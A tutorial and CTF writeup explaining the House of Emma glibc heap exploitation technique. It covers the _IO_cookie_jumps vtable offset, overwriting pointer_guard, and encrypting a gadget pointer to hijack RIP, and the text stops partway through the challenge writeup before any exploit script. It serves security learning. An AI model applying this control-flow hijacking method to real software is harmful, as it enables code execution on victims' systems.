Foreword
Before embarking on this deep dive into the intricacies of heap exploitation named House of Emma, we should have a fundamental understanding on the House of Kiwi from another post—the trigger of I/O operation which we are gonna exploit with House of Emma.
There are several well-regarded articles discussing the House of Emma exploitation technique. However, I've identified some key misunderstandings in the attack chain. Why do we alter the vtable pointer to _IO_cookie_jumps
with an offset of 0x40
? Why place our malicious gadget at offset 0xF0
, which exceeds the length limit of a standard file struct? And what is the ultimate goal of this chain—where does it lead to hijack the RIP
? Contrary to popular belief, the destination is NOT the __cookie
pointer.
Even though we can now use another attack chain, House of Apple, to hijack I/O operations in a relatively simpler way, the seemingly more complex House of Emma—which requires deeper research into the TLS/TCB structure—remains an enlightening and powerful methodology in heap exploitation for high-version GLIBC such as 2.35.
In the writeup section of this article, I'll walk through a PWN challenge that exploits GLIBC 2.34, which helps us to explore these questions in depth and untangle the complexities of this technique.
Overview
In the GLIBC 2.34 release, which was made public on August 1, 2021, commonly used hooks in CTF pwn challenges, such as __free_hook
and __malloc_hook
, were removed. Furthermore, after glibc-2.34-0ubuntu3.2_amd64
, restriction on the attack of hijacking vtable pointer in an IO struct has been applied via IO_validate_vtable
which we introduced here.
Due to changes in the new version, we are forced to rethink our exploitation approach. Traditionally, we aimed for arbitrary address allocation to achieve arbitrary read/write, which eventually led to a shell. Now, the goal has shifted to directly writing to a controlled address that leads to a shell or execution flow hijacking, leveraging the IO_FILE structure used in low-level I/O operation.
Soon after the version released, a talented hacker has introduced a fantastic attack chain in this article and name it the "House of Emma".
However, the author did not explicitly explain the attack chain, and even other well-regarded articles, such as the analysis by Qianxin, a leading cybersecurity company in China, have, in my view, misinterpreted the actual execution flow.
_IO_cookie_jumps
A simple recap for the security check IO_validate_vtable
:
static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
/* Fast path: The vtable pointer is within the __libc_IO_vtables
section. */
uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
uintptr_t ptr = (uintptr_t) vtable;
uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
if (__glibc_unlikely (offset >= section_length))
/* The vtable pointer is not in the expected section. Use the
slow path, which will terminate the process if necessary. */
_IO_vtable_check ();
return vtable;
}
We can no longer hijack the vtable pointer in the _IO_FILE_plus
struct with arbitrary values, but only within the section of __libc_IO_vtables
. Thus, the House of Emma introduces a methodology to complete the attack while adhering to these restrictions. By modifying the vtable
pointer to _IO_xxxx_jumps
and applying a slight offset, we can manipulate the normal execution flow to redirect it to other executable functions. These functions reference an IO_FILE structure that we control through some other arbitrary-address-write primitive, such as the Largebin Attack introduced in this post.
Unlike techniques such as House of Apple or House of Cat, where the vtable
is replaced with _IO_wfile_jumps
, in this case, we leverage _IO_cookie_jumps
, which follows a similar structure:
static const struct _IO_jump_t _IO_cookie_jumps libio_vtable = {
JUMP_INIT_DUMMY, // Offset: 0x00, Size: 0x10 (Dummy entry)
JUMP_INIT(finish, _IO_file_finish), // Offset: 0x10, Size: 0x08
JUMP_INIT(overflow, _IO_file_overflow), // Offset: 0x18, Size: 0x08
JUMP_INIT(underflow, _IO_file_underflow), // Offset: 0x20, Size: 0x08
JUMP_INIT(uflow, _IO_default_uflow), // Offset: 0x28, Size: 0x08
JUMP_INIT(pbackfail, _IO_default_pbackfail), // Offset: 0x30, Size: 0x08
JUMP_INIT(xsputn, _IO_file_xsputn), // Offset: 0x38, Size: 0x08
JUMP_INIT(xsgetn, _IO_default_xsgetn), // Offset: 0x40, Size: 0x08
JUMP_INIT(seekoff, _IO_cookie_seekoff), // Offset: 0x48, Size: 0x08
JUMP_INIT(seekpos, _IO_default_seekpos), // Offset: 0x50, Size: 0x08
JUMP_INIT(setbuf, _IO_file_setbuf), // Offset: 0x58, Size: 0x08
JUMP_INIT(sync, _IO_file_sync), // Offset: 0x60, Size: 0x08
JUMP_INIT(doallocate, _IO_file_doallocate), // Offset: 0x68, Size: 0x08
JUMP_INIT(read, _IO_cookie_read), // Offset: 0x70, Size: 0x08
JUMP_INIT(write, _IO_cookie_write), // Offset: 0x78, Size: 0x08
JUMP_INIT(seek, _IO_cookie_seek), // Offset: 0x80, Size: 0x08
JUMP_INIT(close, _IO_cookie_close), // Offset: 0x88, Size: 0x08
JUMP_INIT(stat, _IO_default_stat), // Offset: 0x90, Size: 0x08
JUMP_INIT(showmanyc, _IO_default_showmanyc), // Offset: 0x98, Size: 0x08
JUMP_INIT(imbue, _IO_default_imbue) // Offset: 0xA0, Size: 0x08
};
This particular vtable uses the struct _IO_jump_t
. The function pointers inside are initialized via the JUMP_INIT
macro, and each corresponds to a specific operation in the vtable.
_IO_cookie_xxxx
In typical situations, the _IO_cookie_jumps
vtable pointer is set when the fopencookie
function is called. Well then, in an attack scenario, once we successfully modify the vtable pointer to _IO_cookie_jumps
, several functions within this vtable—such as _IO_cookie_read
, _IO_cookie_write
, _IO_cookie_seek
, and _IO_cookie_close
—can potentially lead to arbitrary function or pointer execution—when we have controlled the memory data at specific offset on a hijacked IO_FILE.
Function _IO_cookie_read
at offset 0x70:
static ssize_t
_IO_cookie_read (FILE *fp, void *buf, ssize_t size)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_read_function_t *read_cb = cfile->__io_functions.read;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (read_cb);
#endif
if (read_cb == NULL)
return -1;
return read_cb (cfile->__cookie, buf, size);
}
Function _IO_cookie_write
at offset 0x78:
static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (write_cb);
#endif
if (write_cb == NULL)
{
fp->_flags |= _IO_ERR_SEEN;
return 0;
}
ssize_t n = write_cb (cfile->__cookie, buf, size);
if (n < size)
fp->_flags |= _IO_ERR_SEEN;
return n;
}
Function _IO_cookie_seek
at offset 0x80:
static off64_t
_IO_cookie_seek (FILE *fp, off64_t offset, int dir)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_seek_function_t *seek_cb = cfile->__io_functions.seek;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (seek_cb);
#endif
return ((seek_cb == NULL
|| (seek_cb (cfile->__cookie, &offset, dir)
== -1)
|| offset == (off64_t) -1)
? _IO_pos_BAD : offset);
}
Function _IO_cookie_close
at offset 0x88:
static int
_IO_cookie_close (FILE *fp)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_close_function_t *close_cb = cfile->__io_functions.close;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (close_cb);
#endif
if (close_cb == NULL)
return 0;
return close_cb (cfile->__cookie);
}
They all eventually calls functions look like xxxx_cb
and takes an argument cfile
, which refers to another IO_FILE struct as part of the extension to the original _IO_FILE
.
struct _IO_cookie_file
The variable cfile
is used to refer to those functions. From the internal C library functions mentioned above, we can see that it belongs to the _IO_cookie_file
structure:
/* Special file type for fopencookie function. */
struct _IO_cookie_file
{
struct _IO_FILE_plus __fp;
void *__cookie; // offset: 0xE0
cookie_io_functions_t __io_functions; // offset: 0xE8
};
It has a larger structure than the standard _IO_FILE_plus
(ending at offset 0xD8), adding new members from offset 0xE0.
__io_functions
From offset 0xE8 of the struct _IO_cookie_file
, sits the __io_functions
pointer, which belongs to a special structure cookie_io_functions_t
:
type = struct _IO_cookie_io_functions_t {
cookie_read_function_t *read; // Offset: 0x00, 0xE8 in _IO_cookie_file
cookie_write_function_t *write; // Offset: 0x08, 0xF0 in _IO_cookie_file
cookie_seek_function_t *seek; // Offset: 0x10, 0xF8 in _IO_cookie_file
cookie_close_function_t *close; // Offset: 0x18, 0x100 in _IO_cookie_file
}
This is the real destination of the attack chain for House of Emma, where we hijack the rip
to an evil pointer.
PTR_DEMANGLE
If we look carefully, there's special a preprocessor directive (#ifdef
) and a function-like macro (PTR_DEMANGLE
) inside each function snippet:
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (write_cb);
#endif
- If
PTR_DEMANGLE
is defined, the code between the#ifdef
and the corresponding#endif
is included in the compilation. - If
PTR_DEMANGLE
is not defined, the code block is ignored.
This is a security measure to prevent attackers manipulating function pointers:
extern uintptr_t __pointer_chk_guard attribute_relro;
# define PTR_MANGLE(var) \
(var) = (__typeof (var)) ((uintptr_t) (var) ^ __pointer_chk_guard)
# define PTR_DEMANGLE(var) PTR_MANGLE (var)
Take the _IO_cookie_write
function as an example, we can disassemble it in GDB:
The macro takes a pointer variable var
(rdi+0xf0
), converts it to a uintptr_t
, and applies an XOR operation with __pointer_chk_guard
from TLS Segment:
mov rax, [rdi+0xf0]
ror rax, 0x11
xor rax, fs:[0x30]
The pointer encryption guard value is initialized by the dynamic linker, which exposes two variables—
__pointer_chk_guard_local
is hidden and can be used by dynamic linker code to access the guard value more efficiently, and__pointer_chk_guard
is global and should be used by the dynamically linked C library.
pointer_guard
The pointer_guard
(__pointer_chk_guard
) is the value stored at fs:[0x30]
(fs:[offsetof(tcbhead_t, pointer_guard)]
), used by the PTR_MANGLE
and PTR_DEMANGLE
macros to encrypt and decrypt function pointers, as discussed earlier.
This topic requires a solid understanding of TLS/TCB. I highly recommend the research by Chao-tic. Though it's a lengthy read, it's wonderfully written and well worth the time—I found myself reading it twice.
Here, I'll provide a brief introduction to the parts most relevant to our attack.
__pointer_chk_guard
Where can we find the pointer guard (__pointer_chk_guard
)?
It's stored within a data structure known as the Thread Control Block (TCB), which holds important information and metadata to manage a thread and its associated local storage (TLS).
In Linux systems, the tcbhead_t
is the specific implementation of the TCB used by LIBC.
type = struct {
/* 0 | 8 */ void *tcb;
/* 8 | 8 */ dtv_t *dtv;
/* 16 | 8 */ void *self;
/* 24 | 4 */ int multiple_threads;
/* 28 | 4 */ int gscope_flag;
/* 32 | 8 */ uintptr_t sysinfo;
/* 40 | 8 */ uintptr_t stack_guard; // offset 0x28
/* 48 | 8 */ uintptr_t pointer_guard; // offset 0x30
/* 56 | 16 */ unsigned long unused_vgetcpu_cache[2];
/* 72 | 4 */ unsigned int feature_1;
/* 76 | 4 */ int __glibc_unused1;
/* 80 | 32 */ void *__private_tm[4];
/* 112 | 8 */ void *__private_ss;
/* 120 | 8 */ unsigned long long ssp_base;
/* 128 | 512 */ __128bits __glibc_unused2[8][4];
/* 640 | 64 */ void *__padding[8];
/* total size (bytes): 704 */
}
At offsets 0x28
and 0x30
, we encounter familiar components: the stack_guard
, which holds the canary value, and the pointer_guard
, which is the key used to XOR-encrypt function pointers. These values are randomly generated each time the program starts. In GDB, we can view them by inspecting the fsbase
:
The fs
register is commonly used in thread-local storage (TLS) and other context-sensitive data on x86 and x86_64 (AMD64) architectures, primarily used for accessing thread-specific data or CPU-specific data in a flat memory model (while Windows and macOS uses the GS register for this purpose):
- The
fs
register stores a base address that points to the TLS area. - Using this base address, thread-local variables can be quickly accessed by adding an offset to the value in the
fs
register.
Thus, the pointer_guard
value is located at fs[0x30]
, which corresponds to a specific TLS offset adjacent to the LIBC memory area. This offset remains constant, enabling predictable manipulation. However, leaking or directly modifying it is challenging—changing the fs
register requires kernel-level privileges (ring 1), while we operate at ring 3 (user land). While we can retrieve the values stored in FS and GS, we cannot change their addresses.
As attackers, though, we can attempt to modify the value at this exact address using various exploit primitives, such as:
- Fastbin Reverse Into Tcache
- Tcache Stashing Unlink Attack
- LargeBin Attack
Overall, the main idea is to leverage vulnerabilities to replace this random value to a known address, overcoming the protections provided by pointer encryption.
__pointer_chk_guard_local
In fact, there is a copy of the pointer guard stored as the global variable __pointer_chk_guard_local
, located in the .RODATA
section (read-only), which cannot be overwritten.
This copy allows for easy and fast access. When we overwrite the value at fs:[0x30]
, the __pointer_chk_guard_local
remains unchanged.
Algorithm
Now that we know what the pointer_guard
is and where it resides, we can use maths to show how the PTR_MANGLE
macro encrypts function pointers and how PTR_DEMANGLE
decrypts them.
For the encryption process (PTR_MANGLE
):
rol(ptr ^ pointer_guard, 0x11, 64)
For the decryption process (PTR_DEMANGLE
):
ror(enc, 0x11, 64) ^ pointer_guard
In an exploit scenario, if we can hijack the pointer_guard
and replace it with an evil_guard
(using techniques like a Largebin Attack, for example), we can then write the enc
value to a controlled memory area—namely a fake _IO_cookie_file
structure in House of Emma. By encrypting our malicious function pointer (ptr
), we can ultimately hijack the RIP
:
enc = rol(ptr ^ evil_guard, 0x11, 64)
Perquisites
To successfully carry out the House of Emma attack, the following primitives are typically required:
- The ability to write to a controlled address arbitrarily (using techniques like LargeBin Attack, Tcache Stashing Unlink Attack, etc.).
- The ability to trigger an I/O stream (via FSOP or House of Kiwi).
Trigger
Therefore, triggering an I/O stream is essential for exploiting heap vulnerabilities related to IO structures.
I've previously introduced methods to trigger I/O operations without the program's awareness in House of Kiwi. I won't delve into that topic here, but if needed, you can explore the detailed methodology through the link.
Simply put, one straightforward way to trigger an I/O operation is by leveraging the exit
function, if present in the binary:
exit
└───► fcloseall
└───► _IO_cleanup
└───►_IO_flush_all_lockp
└───►_IO_OVERFLOW
Alternatively, __malloc_assert
can come into play if the allocator fails to allocate a chunk as requested:
_int_malloc
└───►sysmalloc
└───►__malloc_assert
└───► fflush(stderr)
└───►_IO_file_sync
Additionally, there's another execution chain that runs before fflush
is triggered:
_int_malloc
└───► sysmalloc
└───► __malloc_assert
└───► __fxprintf
└───► __vfxprintf
└───► __vfxprintf_internal
└───► _IO_file_xsputn
In this post introducing House of Emma, we will use the latter method to trigger I/O operations, as the upcoming PWN challenge I will analyze does not have an exit
function but runs in an infinite loop.
Attack Chain
We opt to trigger __malloc_assert
to initiate the I/O operation (using the House of Kiwi attack). Before the IO structure is hijacked, the binary will print an error message.
Once we hijack the vtable pointer to _IO_cookie_jumps
, calling fflush(stderr)
will navigate into the IO structure under our control as follows:
Let me explain explicitly what happens in the above image. Before hijacking, the flow would look like this:
stderr->_IO_file_jumps->_IO_file_xsputn
After hijacking stderr
, we can overwrite its vtable pointer at offset 0xD8
with the pointer to _IO_cookie_jumps
, resulting in the following flow:
(hijacked)stderr->_IO_cookie_jumps->_IO_new_file_xsputn
However, executing _IO_new_file_xsputn
doesn't allow for arbitrary function pointer execution, which is not our goal. This is where the House of Emma introduces a key technique—offsetting the vtable pointer
Specifically, after hijacking stderr
, we can write _IO_cookie_jumps+0x40
into the vtable pointer position. This offsets the execution flow, redirecting it to _IO_cookie_write
:
Notice that rdi
(and rbx
) points to the heap address, aka the fake stderr
, we are in control. It is now:
(hijacked)stderr->_IO_cookie_jumps+0x40->_IO_cookie_write
Therefore, the full Attack Chain for House of Emma can be depicted as:
__malloc_assert
└───►__fxprintf
└───► _IO_default_xsputn (before)
└───► _IO_cookie_write (after)
└───► write_cb (cfile->__cookie, buf, size)
Alternatively, we can hijack the
_IO_file_sync
pointer in thefake stderr
structure to exploitfflush(stderr)
. Additionally, we can select any of the_IO_cookie_xxxx
functions (read
,seek
,close
), not just thewrite
function, by adjusting the corresponding offset.
So, what happens after hijacking the vtable pointer to _IO_cookie_jumps+0x40
, ultimately leading to the desired endpoint, write_cb
? Let's first take a preliminary look at an attack demo running in GDB to better understand the overall scenario.
Once we've set up the deployment as discussed earlier, we can dive deeper into the behavior of the _IO_cookie_write
function and observe its unusual, manipulated execution flow:
At some point above, the value stored at [rdi+0xe0]
is used as the first argument for the upcoming function call to write_cb
. Before this operation, rdi
points to the cfile
(the fake _IO_cookie_file
structure), as it is the first argument of the current function call, _IO_cookie_write
. At offset 0xE0
of the fake _IO_cookie_file
, we have the void* __cookie
pointer, which we can hijack to pass as the first argument to our malicious function.
Let's move back to the beginning of the function _IO_cookie_write+4
, it mov rax, [rdi+0xf0]
as the encrypted function pointer and will pass it to rip
(namely executing write_cb
) after decrypting it with the hijacked pointer_guard
:
We can notice that I placed a well-constructed value into this specific position, which can be decrypted by the PTR_DEMANGLE
macro as the evil gadget—getkeyserv_handle+576
:
After controlling the rdx
register with this evil gadget, we can then continue the classic exploit chain using the setcontext+61
gadget. We will show the remaining part in our exploit script for the PWN challenge.
All mentioned evil gadget are introduced in this post.
In conclusion, we need to fake the stderr
and _IO_cookie_file
structure, especially hijacking the values at offset 0xE0
and 0xF0
on the fake _IO_cookie_file
. But, why here?
Debug
To understand how the House of Emma works, we need to take a closer look at the execution flow triggered by the _IO_cookie_jumps
pointer.
As mentioned earlier, when the vtable pointer is overwritten with the _IO_cookie_pointer
or its relative offset, the program references this jump table and executes the corresponding function pointers. Additionally, the read
, write
, seek
, and close
functions refer to the _IO_cookie_file
structure, a specialized case of _IO_FILE
designed for user-defined I/O operations.
Typically, this structure is used when fopencookie
is called to create a custom I/O stream with user-specified operations for reading, writing, seeking, and closing.
Demo Code
Now, let's examine the typical case before the I/O stream is exploited. I've designed a C script and compiled it to test the fopencookie
function:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Custom write function
ssize_t my_write(void *cookie, const char *buf, size_t size) {
printf("Custom write function called with size: %zu\n", size);
printf("Buffer contents: %.*s\n", (int)size, buf);
// Accessing the cookie data for demonstration purposes
if (cookie != NULL) {
int *my_cookie = (int *)cookie;
printf("Cookie value: %d\n", *my_cookie);
}
return size;
}
// Custom read function
ssize_t my_read(void *cookie, char *buf, size_t size) {
static int called = 0; // Track how many times my_read has been called
const char *data = "Hello, world!";
size_t len = strlen(data);
if (called > 0) {
// Simulate end-of-file after the first read
return 0; // No more data to read
}
if (size > len) size = len;
memcpy(buf, data, size);
called++; // Increment the counter to prevent further reads
printf("Custom read function called, providing data.\n");
return size; // Return the number of bytes read
}
int main() {
// Set up the cookie with custom data
int cookie_data = 0xdeadbeef;
// Set up the cookie IO functions
cookie_io_functions_t io_funcs = {
.read = my_read,
.write = my_write,
.seek = NULL,
.close = NULL
};
// Create a custom stream with fopencookie, using the custom cookie
FILE *custom_stream = fopencookie(&cookie_data, "w+", io_funcs);
if (!custom_stream) {
perror("Failed to open custom stream");
return 1;
}
// Write to the custom stream to trigger the custom write function
fprintf(custom_stream, "Test writing to custom stream.\n");
fflush(custom_stream);
// Close the custom stream
fclose(custom_stream);
return 0;
}
// gcc -g -o fopencookie fopencookie.c
This C code defines custom functions like my_read
, my_write
, etc. They're designed to simulate the behavior of reading/writing from a custom file-like object created using fopencookie
in GLIBC. The custom functions are part of the cookie_io_functions_t
structure, which allows us to define our own read, write, seek, and close operations for file streams.
Goal
The objective of the debugging process here is to understand and debug how the my_write
function operates as a child function of the cookie_io_functions_t
structure, which is called internally by _IO_cookie_write
in glibc:
To solve our questions for House of Emma, we will:
- Investigate the
_IO_cookie_file
structure to understand how it stores the custom I/O functions (such asmy_read
andmy_write
). - Debug the behavior of the
__io_functions
field within GLIBC to understand how thefopencookie
mechanism uses it to handle custom file operations.
Go-Through
Our ultimate goal in the House of Emma exploit is to hijack _IO_cookie_write
. To further analyze this, we can set a breakpoint at this function and inspect it in GDB:
It behaves exactly the same as we introduced in previous chapters. We know its 1st argument is FILE *fp
referring to rdi
register. Let's grep the source code of the _IO_cookie_write
function below:
static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (write_cb);
#endif
if (write_cb == NULL)
{
fp->_flags |= _IO_ERR_SEEN;
return 0;
}
ssize_t n = write_cb (cfile->__cookie, buf, size);
if (n < size)
fp->_flags |= _IO_ERR_SEEN;
return n;
}
In this function, the FILE *fp
argument is cast to the _IO_cookie_file
structure. This cast transforms the generic FILE
stream pointer into the more specific _IO_cookie_file
structure, which is used when working with custom I/O operations through fopencookie
.
Take an inspection on fp
at runtime:
A closer observation at fp
, aka the cfile
, as the structure _IO_cookie_file
:
The vtable now points to _IO_cookie_jumps
as we exactly expect. And outside the file
structure, at offset 0xE0, sits the __cookie
pointer pointing to void* cookie
—the 1st of all 3 arguments of our demo function my_write
, simulating the write_cb (cfile->__cookie, buf, size)
function in GLIBC:
It contains the 4-byte int
type data we set in the C code:
And inside the __io_function
block starting from offset 0xE8, which appears to be another structure, includes 4 function pointers which seems to be obfuscated:
According to the GLIBC source code, it will execute write_cb
, namely the write
pointer inside this structure:
But it cannot be disassembled apparently. Because they are all encrypted by the PTR_MANGLE
pointer as we introduced.
Let's try to decrypt this one using the algorithm illustrated in previous chapters. First we will need to know the pointer_guard
valued randomly generated at runtime, which is stored at fs:[0x30]
:
Extract these values and apply the decryption algorithm by PTR_DEMANGLE
:
ror(enc, 0x11, 64) ^ pointer_guard
In our demo, it should be calculated as:
ror(0x45784fde6bfd6c6a, 0x11, 64) ^ 0xb63577e972ba6797
Calculate the result:
def ror(value, shift, bit_size):
"""Performs a bitwise right rotate (ROR) on the given value."""
return ((value >> shift) | (value << (bit_size - shift))) & ((1 << bit_size) - 1)
# Encrypted value and pointer guard
encrypted_value = 0x45784fde6bfd6c6a
pointer_guard = 0xb63577e972ba6797
shift_value = 0x11 # The shift for the ROR operation
bit_size = 64 # 64-bit values
# Apply the ROR and XOR with pointer_guard
decrypted_value = ror(encrypted_value, shift_value, bit_size) ^ pointer_guard
decrypted_value
We have a result of 93824992236137
(0x555555555269
in hexadecimal). Now it looks like a valid function pointer which can be disassembled:
Exactly! This is the my_write
function defined in the C code for io_funcs.write
, which follows the same structure as cookie_io_functions_t
. If we can hijack this value at offset 0xF0
within the _IO_cookie_file
structure, we can take control of rip
—and ultimately hijack the entire execution flow!
End
In conclusion, the target of the attack chain in the House of Emma exploit is the __io_functions.write
function, located at offset 0xF0
within the _IO_cookie_file
structure. This function references the __cookie
pointer, which is used as the first argument (rdi
) and is positioned at offset 0xE0
.
The attack chain can be depicted as:
_IO_cookie_write
└───► write_cb
└───►*(cfile.__io_functions.write)(__cookie, buf, size)
Writeup
In the final chapter, I will share a writeup on exploiting a PWN challenge using the House of Emma methodology, combined with the I/O stream stringer strategy from House of Kiwi.
Binary: link
EXP template: link
Impression
With full protection enabled on the binary within a sandbox, we can still exploit it using the ORW (Open, Read, Write) attack introduced here:
This is not a typical program—it behaves like a virtual machine, telling us only to supply opcodes in binary form:
We can input binary data for a program in Linux system like the following operation, which can be helpful for our debugging:
But obviously we provided a meaningless test payload and the program returns "Invalid opcode" in an infinite loop:
To understand how this program operates, we must decompile the binary to uncover its functionality.
Code Review
Since the main
function lacks an exit
function and only uses _exit
in other functions—which won't trigger I/O operations necessary for our FSOP attack—we need to leverage the House of Kiwi primitive to perform the exploit by triggering __malloc_error
.
Main
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
void *s; // [rsp+8h] [rbp-8h]
setup(a1, a2, a3);
while ( 1 )
{
puts("Pls input the opcode");
s = malloc(0x2000uLL);
memset(s, 0, 0x2000uLL);
read(0, s, 0x500uLL);
vm_run(s);
free(s);
}
}
It runs an infinite loop, repeatedly asking for user input (opcodes) and executing them in a virtual machine-like environment.
The while (1)
loop continuously runs the following operations:
s = malloc(0x2000uLL)
: Allocates 0x2000 bytes of memory to hold the user's input.memset(s, 0, 0x2000uLL)
: Clears the allocated memory by setting it to zero.read(0, s, 0x500uLL)
: Reads up to 0x500 bytes from the standard input (file descriptor0
, i.e., stdin) into the allocated memorys
.vm_run(s)
: Passes the input to a function calledvm_run
, which interprets and executes the opcodes in the memory pointed to bys
.free(s)
: Frees the allocated memory aftervm_run
completes.
Setup
int sub_16D5()
{
// ... omit variables
v35 = __readfsqword(0x28u);
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stderr, 0LL, 2, 0LL);
prctl(38, 1LL, 0LL, 0LL, 0LL);
// ... omit dereference
return prctl(22, 2LL, &v1);
}
Usually we don't pay a lot attention on the setup
function. This one is related to some thread setup via prctl
syscall which plays an important role in TLS/TCB context.
- Set Buffering Mode for I/O Streams:
- The calls to
setvbuf(stdin, 0LL, 2, 0LL)
,setvbuf(stdout, 0LL, 2, 0LL)
, andsetvbuf(stderr, 0LL, 2, 0LL)
disable buffering forstdin
,stdout
, andstderr
streams. This means all input/output operations are immediate without buffering, often done to avoid delays in interactive programs.
- The calls to
- prctl(38, 1LL, 0LL, 0LL, 0LL):
- The
prctl(38, 1LL, 0LL, 0LL, 0LL)
call corresponds to thePR_SET_NO_NEW_PRIVS
option (38), which restricts the process from gaining new privileges. Setting it to1LL
means that no new privileges will be granted (for example, after a setuid or setgid change).
- The
- prctl(22, 2LL, &v1):
- This call is related to
PR_SET_PDEATHSIG
(22), which sets a signal that the kernel will send to the process when its parent dies. In this case, it appears to be setting a signal (likelySIGINT
orSIGKILL
) that will trigger when the parent process dies, based on thev1
variable, which is initialized to8
(possiblySIGFPE
or another signal).
- This call is related to
Add
_DWORD *__fastcall add(__int64 a1)
{
_DWORD *result; // rax
unsigned __int8 idx; // [rsp+1Dh] [rbp-13h]
unsigned __int16 size; // [rsp+1Eh] [rbp-12h]
idx = *(_BYTE *)(a1 + 1);
size = *(_WORD *)(a1 + 2);
if ( size <= 0x40Fu || size > 0x500u || idx > 0x10u )
{
puts("ERROR");
_exit(0);
}
pool[idx] = calloc(1uLL, size);
result = size_pool;
size_pool[idx] = size;
return result;
}
The add
function reads an index (idx
) and a size (size
) from a specified memory location, validates them, allocates memory from a pool if the values are valid, and stores the size of the allocated memory.
If the inputs are invalid, restricting the allocated chunk size within 0x410
to 0x500
, it terminates the program.
Delete
void __fastcall delete(__int64 a1)
{
unsigned __int8 idx; // [rsp+1Fh] [rbp-1h]
idx = *(_BYTE *)(a1 + 1);
if ( idx > 0x10u || !*((_QWORD *)&pool + idx) )
{
puts("Invalid idx");
_exit(0);
}
free(*((void **)&pool + idx));
}
It does not clear out the pointer after free'ing a chunk. This resides a typical UAF vulnerability, which results in chunk overlapping.
Show
int __fastcall show(__int64 a1)
{
unsigned __int8 idx; // [rsp+1Fh] [rbp-1h]
idx = *(_BYTE *)(a1 + 1);
if ( idx > 0x10u || !*((_QWORD *)&pool + idx) )
{
puts("Invalid idx");
_exit(0);
}
return puts(*((const char **)&pool + idx));
}
With the UAF primitive, we can leverage this to print out leaked information. And there's no boundary check here.
Edit
void *__fastcall edit(__int64 a1)
{
unsigned __int8 idx; // [rsp+1Dh] [rbp-3h]
unsigned __int16 size; // [rsp+1Eh] [rbp-2h]
idx = *(_BYTE *)(a1 + 1);
size = *(_WORD *)(a1 + 2);
if ( idx > 0x10u || !*((_QWORD *)&pool + idx) )
{
puts("Invalid idx");
_exit(0);
}
if ( (unsigned int)size > size_pool[idx] )
{
puts("Invalid size");
size = size_pool[idx];
}
return memcpy(*((void **)&pool + idx), (const void *)(a1 + 4), size);
}
Edit specific opcodes (in the pool) via the idx
variable.
Vm_run
__int64 __fastcall vm_run(__int64 a1)
{
while ( 1 )
{
switch ( *(_BYTE *)a1 & 0xF )
{
case 1:
add(a1);
a1 += 4LL;
puts("Malloc Done");
break;
case 2:
delete(a1);
a1 += 2LL;
puts("Del Done");
break;
case 3:
show(a1);
a1 += 2LL;
puts("Show Done");
break;
case 4:
edit(a1);
a1 += *(unsigned __int16 *)(a1 + 2) + 4LL;
puts("Edit Done");
break;
case 5:
return 0LL;
case 6:
*(_WORD *)(a1 + 3) = *(unsigned __int8 *)(a1 + 2) + *(unsigned __int8 *)(a1 + 1);
a1 += 5LL;
break;
case 7:
*(_WORD *)(a1 + 3) = *(unsigned __int8 *)(a1 + 2) - *(unsigned __int8 *)(a1 + 1);
a1 += 5LL;
break;
case 8:
*(_WORD *)(a1 + 3) = (unsigned __int8)(*(_BYTE *)(a1 + 1) ^ *(_BYTE *)(a1 + 2));
a1 += 5LL;
break;
case 9:
*(_WORD *)(a1 + 3) = *(unsigned __int8 *)(a1 + 2) * *(unsigned __int8 *)(a1 + 1);
a1 += 5LL;
break;
case 0x10:
*(_WORD *)(a1 + 3) = (unsigned __int8)(*(_BYTE *)(a1 + 2) / *(_BYTE *)(a1 + 1));
a1 += 5LL;
break;
default:
puts("Invalid opcode");
break;
}
}
}
The vm_run
function acts like a virtual machine interpreter, continuously reading and executing commands based on a series of opcodes from the memory location pointed to by a1
. Each opcode determines the operation to be performed.
- Infinite Loop:
- The function runs an infinite loop (
while (1)
) and reads opcodes from the memory location ata1
.
- The function runs an infinite loop (
- Opcode Handling:
- The function checks the opcode by evaluating
*(_BYTE *)a1 & 0xF
, which extracts the lower 4 bits of the byte ata1
. Based on this value, the function branches to different cases.
- The function checks the opcode by evaluating
- Operations:
- Case 1: Calls the
add(a1)
function (likely to allocate memory) and advancesa1
by 4 bytes. - Case 2: Calls the
delete(a1)
function (likely to free memory) and advancesa1
by 2 bytes. - Case 3: Calls the
show(a1)
function (likely to display memory) and advancesa1
by 2 bytes. - Case 4: Calls the
edit(a1)
function (likely to modify memory) and advancesa1
based on the value ata1 + 2
plus 4 bytes. - Case 5: Terminates the loop by returning 0, signaling the end of execution.
- Cases 6-9, 0x10: Perform arithmetic operations (addition, subtraction, XOR, multiplication, and division) using values from memory, storing results at
a1 + 3
and advancinga1
by 5 bytes.
- Case 1: Calls the
- Error Handling:
- If an invalid opcode is encountered, it prints "Invalid opcode" and continues.
The vm_run
function is a simple virtual machine that processes opcodes, performing actions like memory allocation (add
), deletion (delete
), display (show
), and modification (edit
). The basic arithmetic operations are just for fun :). The function continuously executes until it encounters a termination opcode (5
).
Methodology
The opcodes are stored in the first allocated 0x2000 chunk, and will be cleared out each time we quit an infinite loop of the vm_run
function (by option 5):
With the vulnerabilities identified through code review, we can exploit this challenge by following these steps:
- Leak an Address via Use-After-Free (UAF) Primitive: This allows us to create chunk overlapping, providing the foundation for further exploitation.
- Hijack the
stderr
